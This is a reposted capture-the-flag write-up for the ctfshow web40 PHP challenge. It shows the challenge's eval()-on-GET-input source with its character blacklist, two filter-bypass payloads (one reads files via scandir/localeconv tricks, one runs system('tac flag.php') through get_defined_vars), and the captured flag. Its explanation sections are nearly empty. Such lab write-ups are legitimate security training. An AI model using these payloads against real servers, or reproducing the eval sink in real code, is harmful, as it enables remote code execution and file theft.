ToB企服应用市场:ToB评测及商务社交产业平台

标题: 【CTFWP】ctfshow-web40 [打印本页]

作者: 鼠扑    时间: 2024-9-17 05:51
标题: 【CTFWP】ctfshow-web40
提示:文章写完后,目录可以自动生成,如何生成可参考右边的资助文档
  
  

题目先容:

  1. <?php
  2. /*
  3. # -*- coding: utf-8 -*-
  4. # @Author: h1xa
  5. # @Date:   2020-09-04 00:12:34
  6. # @Last Modified by:   h1xa
  7. # @Last Modified time: 2020-09-04 06:03:36
  8. # @email: h1xa@ctfer.com
  9. # @link: https://ctfer.com
  10. */
  11. if(isset($_GET['c'])){
  12.     $c = $_GET['c'];
  13.     if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
  14.         eval($c);
  15.     }
  16.         
  17. }else{
  18.     highlight_file(__FILE__);
  19. }
复制代码
题目分析:

payload:

  1. ?c=echo highlight_file(next(array_reverse(scandir(pos(localeconv())))));
复制代码
payload解释:

这段代码尝试通过GET请求使用PHP的eval函数实行恶意代码。下面是对这段代码的分析:

具体来说,这段代码的实行流程如下:
payload2:

  1. ?c=eval(next(reset(get_defined_vars())));&1=;system("tac%20flag.php");
复制代码
payload2解释:

flag


flag=“ctfshow{96c8b1e3-29aa-4010-8f8f-c2437ccb6502}”

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。




欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4